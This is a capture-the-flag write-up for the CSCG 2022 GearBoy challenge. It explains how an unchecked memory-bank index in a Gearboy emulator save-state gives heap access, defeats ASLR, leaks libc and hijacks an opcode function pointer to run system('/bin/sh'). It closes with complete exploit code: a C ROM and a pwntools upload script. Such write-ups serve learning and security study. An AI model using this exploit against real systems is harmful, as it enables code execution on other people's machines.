CSCG 2022 - GearBoy
Last modification on
Challenge
Straight forward task: Exploit the Gearboy emulator.
Overview
The task is to read the contents of the flag file by manipulating a gearboy ROM and state file that will be run on the target server using a modified, headless version of Gearboy, a gameboy emulator.
Analysis
My immediate suspicions were with missing checks for the state file and not the ROM, because the state can be saved & loaded at any point in time, while the ROM only needs to be checked upon initial load. This means that more checks need to be performed on the state file that could be broken or forgotten entirely.
By inspecting the source code for GearboyCore::LoadState
we find the
functionality for the emulator split into many different classes and
a LoadState for each, e.g. Processor::LoadState
and Memory::LoadState
.
Memory::LoadState
loads (among other things) the various memory bank buffers
as well as values that control which banks are selected. Since the address space
of the GameBoy was limited (16-bit), parts of memory had to be swapped
out to facilitate access to more space. Hence the concept of memory
bank switching.
Often times an index is used to indicate which memory bank is in use,
as is the case with WRAM1
:
u8* Memory::GetWRAM1()
{
return m_bCGB ? m_pWRAMBanks + (0x1000 * m_iCurrentWRAMBank) : m_pMap + 0xD000;
}
As long as m_bCGB
(a flag for GameBoy color mode) is set, the
backing buffer of WRAM1
will be chosen from a bank in m_pWRAMBanks
.
The value of m_bCGB
is controlled by special purpose bytes in the
ROM which we control.
Since m_iCurrentWRAMBank
is loaded as part of the state and its value
is not properly sanitized, modifying this value in the state file allows us to
essentially mmap an arbitrary piece of memory into the address space of our
emulated game. When the running ROM writes and reads
to 0xD000-0xE000
, it will instead access the address we control.
But where to write when ASLR is enabled?
To get around ASLR we need to find objects on the heap with consistent
offsets to the WRAM
bank buffer m_pWRAMBanks
. We can do this by
running gdbserver
in the docker container and observing the surrounding
memory and pointers of objects allocated closely before or after. The
fact that each session is a freshly spawned docker container helps
with consistency.
Doing this we find a heap configuration which is consistent on every first
run in the docker container: the address of the Processor
object is
at an offset of -0x126a0
from m_pWRAMBanks
and the Memory
object
is at an offset of -0xd0
from the Processor
object. By setting the
m_iCurrentWRAMBank
value to -0x13
in the state file we will be able
to access the Processor
object at 0x13000-0x126a0+0xD000=0xD960
and the Memory
object at 0x13000-0x125d0+0xD000=0xD890
.
For every instruction, the processor resolves the function for handling
an opcode by looking it up in a table using the opcode as an index. This
opcodeTable
is a member of the Processor
object and as such stored
on the heap. By reading one of these function pointers and subtracting
its offset in the binary we can recover the base address at which the
gearboy emulator is loaded.
Now that we know the base address and as a result the address of the
GOT, regularly the next natural step is to leak
libc by reading the GOT,
calculate the address of system and overwrite a function pointer
to call system. The only problem is, we are still just a ROM in
an emulator and only have access to the memory mapped into 0xD000-0xE000
.
We need to look for another access primitive.
This time, however, we are not limited to our state and rom file contents.
We can manipulate the Memory
and Processor
objects directly!
Looking through the source code again we find a good candidate:
u8* Memory::GetVRAM()
{
if (m_bCGB)
return (m_iCurrentLCDRAMBank == 1) ? m_pLCDRAMBank1 : m_pMap + 0x8000;
else
return m_pMap + 0x8000;
}
We have already set m_bCGB
and m_iCurrentLCDRAMBank
is loaded from the
state file. As such, we can make access to 0x8000-0x9000
backed by the
m_pLCDRAMBank1
buffer, whose pointer we control.
We set m_pLCDRAMBank1
in the Memory
object to point to the target got
address of free
which is calculated using the base address. We can then
read the free
address from 0x8000
, leak the libc base and calculate
the system
address.
To finally call system, we overwrite a function pointer in
Processor::opcodeTable
and call the corresponding opcode.
We ensure the first argument to system
points to the string /bin/sh
by writing it to the address of the Processor
object, as this is the address
in rdi
when system
is called. Since opcodeTable
is the first
member in Processor
we need to choose an opcode to call which does
not conflict with the space used for the string and also is not called
before the value can be fully written (as is the case with the load
instructions). The stop
instruction (enum value 0x10
) is a good fit here.
Exploit
The ROM code was compiled using GBDK.
rom.c
#include "stdint.h"
#include "string.h"
void
main(void)
{
volatile static uint8_t *processor_gb;
volatile static uint8_t *memory_gb;
volatile static uint8_t *free_got_gb;
volatile static uint64_t op0x00;
volatile static uint64_t base;
volatile static uint64_t libc;
volatile static uint64_t free_got;
volatile static uint64_t target;
/* WRAM BANK = -0x13 */
processor_gb = (void*) 0xD960;
memory_gb = processor_gb - 0xd0;
/* get base from op0x00 */
op0x00 = *(uint64_t*)processor_gb;
base = op0x00 - 0x1d420;
free_got = base + 0x4ad78;
/* change lcdrambank pointer to access got */
*(uint64_t*)(memory_gb+0x90) = free_got;
free_got_gb = (void*) 0x8000;
libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
target = libc + 0x52290;
strcpy((char*)processor_gb, "/bin/sh");
*(uint64_t*)(processor_gb+0x10*0x10) = target;
__asm \
stop \
__endasm;
while (1);
}
upload.py
from base64 import b64encode
from sys import argv,exit
from pwn import *
rom = list(open("main.gb", "rb").read())
state = list(open("main.state", "rb").read())
# set m_iCurrentWRAMBank
for i,v in enumerate(struct.pack("<i", -0x13)):
state[0x10000+i] = v
# set m_iCurrentLCDRAMBank
for i,v in enumerate(struct.pack("<i", 1)):
state[0x10004+i] = v
io = process(argv[1:])
io.sendline(b64encode(bytes(rom)))
io.sendline(b64encode(bytes(state)))
io.interactive()